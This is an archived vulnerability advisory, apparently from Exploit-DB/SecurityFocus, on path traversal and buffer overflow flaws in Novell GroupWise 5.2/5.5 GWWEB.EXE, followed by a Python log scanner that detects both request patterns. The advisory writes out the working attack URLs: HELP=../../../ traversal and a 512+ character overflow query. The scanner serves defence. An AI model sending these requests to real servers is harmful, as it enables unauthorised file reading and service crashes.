Vendor: Groupwise
By: SecurityFocus
CVSS: 7.5 HIGH
Path Traversal and Buffer Overflow
CWE: 22, 119
Product Name: Groupwise
Affected Version From: Novell Groupwise 5.2/5.5
Affected Version To: Novell Groupwise 5.2/5.5
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2001

Netscape Enterprise Server for NetWare 4/5 3.0.7 a, Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities

The HELP function in GWWEB.EXE reveals the path of the server and, combined with the '../' string, allows any client read access to any .htm file on the server, as well as browseable directory listings. Requesting the URL http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm or http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../ will allow read access to any .htm file on the server, or to browseable directory listings.

It is also possible to abend GWINTER.NLM by specifying a long string where the server expects a variable setting. Requesting the URL http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars] will abend GWINTER.NLM, and it may be possible to remotely execute arbitrary code via this buffer overflow.

Mitigation:

Ensure that the server is running the latest version of the software and that all security patches have been applied.

Exploit-DB raw data:

Netscape Enterprise Server for NetWare 4/5 3.0.7 a, Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities

source: https://www.securityfocus.com/bid/879/info

The HELP function in GWWEB.EXE will reveal the path of the server, and combined with the '../' string, allow read access for any client to any .htm file on the server, as well as browseable directory listings.

Also, it is possible to abend GWINTER.NLM by specifying a long string where the server expects a variable setting. 

Requesting the following URL from the GroupWise server
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=asdf
will return the error message:
Could not read file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\ASDF.HTM
revealing the full path of the GroupWise server software.
Note: The URL above may need to be tailored to the target system.

To read .htm files anywhere on the server, or to browse directories, use HELP and the ../ string to traverse directories, for example:
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm
or
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../
Again, the paths shown above may need to be modified.

To abend GWINTER.NLM request a URL like:
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars]
It may be possible to remotely execute arbitrary code via this buffer overflow.
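
A log check for the two request patterns described above, as an added example that is not part of the original advisory: it flags GWWEB.EXE requests whose HELP value contains a '..' path segment (also when percent-encoded, which goes beyond the literal URLs shown) or whose query string is 512 or more characters. The Common Log Format input, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_QUERY_LEN = 512  # the advisory's "[512+ chars]" threshold
GWWEB = re.compile(r"/gwweb\.exe\?(?P<query>\S*)", re.IGNORECASE)
HELP = re.compile(r"(?:^|&)help=(?P<value>[^&]*)", re.IGNORECASE)
CLF = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+)')

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm HTTP/1.0" 200 812',
    '192.0.2.11 - - [01/Jan/2001:10:00:05 +0000] "GET /cgi-bin/GW5/GWWEB.EXE?HELP=index HTTP/1.0" 200 2048',
    '198.51.100.7 - - [01/Jan/2001:10:01:00 +0000] "GET /cgi-bin/GW5/GWWEB.EXE?' + "A" * 600 + ' HTTP/1.0" 500 0',
    '192.0.2.10 - - [01/Jan/2001:10:02:00 +0000] "GET /cgi-bin/gw5/gwweb.exe?help=%2e%2e%2f%2e%2e%2f HTTP/1.0" 200 4096',
]


def classify(request_target):
    """Return the set of findings for one request target (path plus query)."""
    findings = set()
    m = GWWEB.search(request_target)
    if not m:
        return findings
    query = m.group("query")
    if len(query) >= MAX_QUERY_LEN:
        findings.add("overlong-query")
    h = HELP.search(query)
    if h:
        # Decode twice so single- and double-encoded "../" are normalised,
        # and treat NetWare-style backslashes as path separators.
        value = unquote(unquote(h.group("value"))).replace("\\", "/")
        if ".." in value.split("/"):
            findings.add("help-traversal")
    return findings


def scan(log_lines):
    """Yield (line_number, client, findings) for each suspicious log line."""
    for n, line in enumerate(log_lines, 1):
        m = CLF.match(line)
        if m:
            findings = classify(m.group("target"))
            if findings:
                yield n, m.group("client"), sorted(findings)


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
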